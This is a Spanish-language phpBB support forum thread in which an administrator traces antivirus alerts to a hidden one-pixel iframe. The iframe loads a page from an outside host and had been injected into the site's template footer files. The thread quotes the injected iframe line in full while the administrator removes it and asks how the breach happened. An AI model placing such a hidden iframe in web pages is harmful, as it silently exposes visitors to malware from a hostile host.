Página 1 de 1

¿Virus En El Foro?

Publicado: 25 Mar 2007, 01:30
por DaRkWoRLd
Muy buenas, soy administrador de un foro phpbb y esta tarde me han llegado comentarios de gente a los que les saltaba su antivirus al acceder al foro. Al entrar, mi antivirus (nod32) no me ha avisado de nada extraño, pero si que habia una barra para instalar un activex, presuntamente de microsoft. Lo he instalado (más que nada por ver que pasaba) y cuando estoy moviendome por el foro, por ejemplo, abriendo algun topic o lo que sea, se oye el sonido éste tipico de windows cuando haces un click en un enlace y en la barra de estado me aparece el mensaje de la imagen:

Imagen

He buscado por google y por este foro algo relacionado (como la direccion esa) pero no saco nada en claro. Agradecería mucho que alguién me dijera que pasos tomar, que cosas hacer y/o posibles soluciones al respecto. Si necesitais algun otro dato, sólo teneis que pedirlo. Gracias de antemano.

URL: http://www.sphinx-metal.net/foro/index3.php (cambiado de index.php para evitar acceso a los usuarios)
Plantilla(s) usuada(s): subBlack
MODs instalados: Varios mods antispam y Ctracker 5
Version de phpBB: 2.0.22
Servidor: pago -> aruba

Respuesta: ¿Virus En El Foro?

Publicado: 25 Mar 2007, 21:09
por DaRkWoRLd
Despues de trastear un poco, hemos visto que en los archivos del foro (index.php, viewtopic, etc.) se añade una linea al final del codigo:

Código: Seleccionar todo

<iframe src="http://www.newoldway.info/c/2261/counter21.php" width=1 height=1 style="display:none"></iframe>
pero si luego accedo al ftp, y edito los archivos, éstos no contienen esta linea. ¿Como se incluye esta linea en el codigo fuente? Otra cosa que he hecho ha sido descargar a mi disco duro todos los archivos del foro, y buscar en todos ellos la palabra: newoldway. Solo me salia un index.htm en la carpeta "cache", archivo que he eliminado del servidor, aunque el problema persiste.

Agradecería toda ayuda, ya que no puedo permitir tener el foro desactivado demasiado tiempo. Gracias.

Respuesta: ¿Virus En El Foro?

Publicado: 26 Mar 2007, 03:39
por carliyoz
busca en el archivo overall_footer.tpl de tu template

Respuesta: ¿Virus En El Foro?

Publicado: 26 Mar 2007, 12:22
por DaRkWoRLd
Gracias por tu ayuda, carliyoz :cerveza: . Efectivamente ese fichero contenia la linea del iframe y tambien el archivo subBlack/admin/page_footer.tpl, que se me habia pasado en la anterior busqueda. Ya parece que no tengo ningun archivo que incluya esta linea.

El tema es que esto es la segunda vez que me pasa en relativamente poco tiempo (la vez anterior no fue exactamente así, pero muy parecido), así que me gustaría saber por qué ocurre, si es que tengo algun tipo de vulnerabilidad que permita que se produzca esta situación.

Un saludo!